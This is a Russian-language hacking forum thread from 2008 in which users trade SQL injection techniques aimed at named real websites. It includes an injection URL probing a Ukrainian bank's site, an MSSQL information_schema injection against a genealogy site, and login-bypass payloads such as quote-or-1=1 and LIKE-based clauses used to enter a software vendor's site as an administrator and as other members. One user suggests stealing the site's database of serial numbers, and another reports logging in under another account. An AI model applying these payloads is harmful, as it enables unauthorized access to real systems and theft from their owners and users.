Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Значение параметра "npcs" передается в функцию js g_inintPath, там преобразоввывается 7 = База=>NPCs=>Humanoids, 7-1 = База=>NPCs=>Undead, и т.д.

    Заметь, при значении 7-1 содержимое самого списка на странице не меняется, т.е. в скуль попадает только 7, а не 7-1, т.ч. параметр "npcs" фильтруется.
     
    #2221 z3r0cool, 6 Jun 2008
    Last edited: 6 Jun 2008
    1 person likes this.
  2. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Какой программой можно формировать и посылать на нужный сайт tcp/ip запросы, просматривать пакеты и пр.?
     
  3. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Я не совсем понял тебя про TCP/IP запросы... хм, это что?
    Если же ты имел виду посылку запросов по HTTP протоколу (POST, GET...) то можно использовать аддоны к файрфоксу.
    UrlParams - позволяет редактировать как гет так и пост. (https://addons.mozilla.org/ru/firefox/addon/1290)
    LiveHTTPheaders - показывает запросы и позволяет их отправить повторно, можно при этом их подредактировать. (http://livehttpheaders.mozdev.org/)
    Tamper Data - позволяет перехватывать запрос и изменять. (http://tamperdata.mozdev.org/help.html)
     
    #2223 Red_Red1, 9 Jun 2008
    Last edited: 9 Jun 2008
    1 person likes this.
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Это я и имел ввиду :) Спасибо :)
     
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Ershik, есть ещё NAVUNS + INETCRACK старая но удобная связка :)
     
    2 people like this.
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Нашёл какой-то банковский сайт).Смог подобрать только количество полей:

    http://www.procreditbank.com.ua/index.php?cat=23&news=3525+order+by+8/*

    Версия 4,вывода нет.Селект-запросы не проходят,чё делать хз.
     
  7. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    посимвольный брут? :confused:
    ----------------------------------------------------
    кстате, скулю кажеться прикрыли ;)
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Хотел спросить о Microsoft OLE DB Provider for SQL Server:
    как реализовать?
     
  9. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    http://www.genealogia.ru/ru/oforums/messages.htm?f=299%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables)
    Там MSSQL, читай маны
     
    2 people like this.
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ок.. понятно.. там int, а данные передаются в nvenchar, нужно использовать convert(int, ) или cast( , as int) для переобразовки? и еще.. как заюзать limit?) ибо не выходит..)
     
    #2230 sabe, 10 Jun 2008
    Last edited: 10 Jun 2008
  11. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Там надо не лимит юзать, а not in вроде как. Я не спец, это всего лишь одна из догадок на основе увиденного в соседней теме )
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 sabe
    По поводу MSSQL вот статья:
    _https://forum.antichat.ru/thread30501.html
    Вопрос такой, что в двух словах не объяснишь
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    спс.. будем учится..)
     
    1 person likes this.
  14. ТАРАНТУЛ

    Joined:
    2 Dec 2007
    Messages:
    4
    Likes Received:
    8
    Reputations:
    -15
    Через какой путь можно замутить взлом)?? chat.bobrik.ru/?59
     
  15. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    http://cyberagesystems.com/member.php
    на том сайте
    Login: Admin
    PAss : '1or'1=1

    можно как админом залогинится, только что толку?
     
  16. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1SeTh, никакого))
    Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
     
    1 person likes this.
  17. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )

    еще не понятно тогда как админ редактирует контент?
     
    #2237 1SeTh, 10 Jun 2008
    Last edited: 10 Jun 2008
  18. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1SeTh, прописать в логин и пароль что-то типа
    -99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
    pass'/*
    за место sergey подбираем слово, которое может входить в мыло.
     
  19. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.

    вместо слово сергей поставил пару американских имен все равно заходить под логином Admin :confused:
     
  20. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1SeTh, я зашел под другим логином :)
    вбиваем
    pizda' or password like '%9%'/*
    pizda' or password like '%9%'/*
    входим под grease2
    =))))
     
Thread Status:
Not open for further replies.